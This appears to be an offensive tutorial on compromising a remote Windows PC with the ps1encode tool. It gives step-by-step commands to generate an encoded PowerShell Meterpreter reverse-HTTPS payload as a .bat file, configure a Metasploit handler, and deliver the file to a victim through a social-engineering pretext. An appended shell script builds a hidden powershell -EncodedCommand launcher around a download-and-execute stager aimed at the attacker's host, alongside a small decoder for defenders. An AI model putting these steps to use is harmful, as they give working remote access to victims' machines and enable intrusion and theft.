Exploit Remote Windows PC using ps1encode Tool

ps1encode generates and encodes PowerShell-based Metasploit payloads, wrapping the encoded stager in whichever launcher format you choose.

 Available output types:

  • raw (encoded payload only – no powershell run options)
  • cmd (for use with bat files)
  • vba (for use with macro trojan docs)
  • vbs (for use with vbs scripts)
  • war (tomcat)
  • exe (executable) requires MinGW – i586-mingw32msvc-gcc [apt-get install mingw32]
  • java (for use with malicious java applets)
  • js (javascript)
  • php (for use with php pages)
  • hta (HTML applications)
  • cfm (for use with Adobe ColdFusion)
  • aspx (for use with Microsoft ASP.NET)
  • lnk (windows shortcut – requires a website to stage the payload)

Open a terminal on Kali Linux, clone the tool and generate a payload. The arguments are the attacker IP (-I), the port the payload will call back to (-p), the Metasploit payload (-a) and the output type (-t); the same IP and port are reused when the handler is configured below:

git clone https://github.com/CroweCybersecurity/ps1encode.git

cd ps1encode

./ps1encode.rb -I 192.168.0.140 -p 4567 -a windows/meterpreter/reverse_https -t cmd

raw => base64 PowerShell code only, without the run options
cmd => default payload; use with .bat files or for an easy copy, paste and shell job
vba => for use with Microsoft Office products for macro trojans
war => for use with Apache Tomcat
exe => executable that starts powershell.exe and injects the code into it; requires MinGW to compile
java => for use with Java applet attacks
php => for use with PHP sites, an alternative to using web shells
hta => HTML Applications; a good alternative to executables in phishing campaigns
cfm => for use with Adobe ColdFusion; like PHP, an alternative to using a web shell

Copy the generated launcher line from the tool's output and save it as a .bat file; this is the file that will be delivered to the target.

Now set up a listener to catch the reverse connection the payload makes when it executes on the target. LHOST and LPORT must match the values passed to ps1encode (-I 192.168.0.140 and -p 4567); the handler's default LPORT for reverse_https is 8443, so set it explicitly:

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.0.140

set lport 4567

exploit

Deliver the batch file to the target with whatever social-engineering pretext fits. When the target runs it, the encoded PowerShell stager executes and the handler receives a Meterpreter session on the target PC.
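The following script is an added example and is not part of ps1encode or of the original post. It shows the shape of what the "cmd" output type produces (a powershell.exe launcher carrying the script as UTF-16LE then base64, which is what -EncodedCommand expects), the reverse step a defender uses to read such a line from a process-creation log or a recovered .bat file, and a handler resource file whose LHOST/LPORT match the -I and -p values given to ps1encode. It assumes a POSIX shell with iconv, base64, grep -E and awk; the STAGER text and its URL are a constructed placeholder, not a Metasploit stager, and the exact launcher switches ps1encode emits may differ from the ones used here.

```shell
#!/bin/sh
# Added example, not part of ps1encode or the original post.
# Assumptions: POSIX sh with iconv, base64, grep -E and awk; STAGER is a
# constructed placeholder (hypothetical URL), not a real Metasploit stager;
# the launcher switches below illustrate the "cmd" type and may differ from
# what ps1encode itself prints.

# -EncodedCommand expects the script as UTF-16LE, then base64.
ps_encode() {
  printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
}

# Reverse of ps_encode: decode a blob seen after -enc / -EncodedCommand.
ps_decode() {
  printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# The launcher line a .bat file would carry for the "cmd" output type.
ps_cmd_line() {
  printf 'powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand %s' "$(ps_encode "$1")"
}

# Pull the blob out of a launcher line (-enc or -EncodedCommand, any case),
# e.g. from a process-creation log line or a recovered .bat file.
ps_extract_blob() {
  printf '%s' "$1" | grep -oiE -- '-(enc|encodedcommand) +[A-Za-z0-9+/=]+' | awk '{print $2}'
}

# msfconsole resource file; LHOST/LPORT/payload must equal ps1encode's -I/-p/-a.
make_handler_rc() {
  lhost="$1"; lport="$2"; payload="$3"
  cat <<EOF
use exploit/multi/handler
set payload $payload
set lhost $lhost
set lport $lport
set ExitOnSession false
exploit -j
EOF
}

# Constructed placeholder stager (hypothetical URL; not a real stager).
STAGER='IEX (New-Object Net.WebClient).DownloadString("https://192.168.0.140:4567/stage")'

demo() {
  line=$(ps_cmd_line "$STAGER")
  printf 'launcher: %s\n' "$line"
  printf 'decoded : %s\n' "$(ps_decode "$(ps_extract_blob "$line")")"
  make_handler_rc 192.168.0.140 4567 windows/meterpreter/reverse_https
}

demo
```

Run the script as-is to see the launcher line, its decoded contents and the resource file; `msfconsole -r handler.rc` (after redirecting make_handler_rc's output to that file) starts the listener with the same LHOST/LPORT the payload was built with, which removes the most common reason a callback never arrives. The decode side is the check a blue team applies to any powershell.exe command line with -enc in it.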
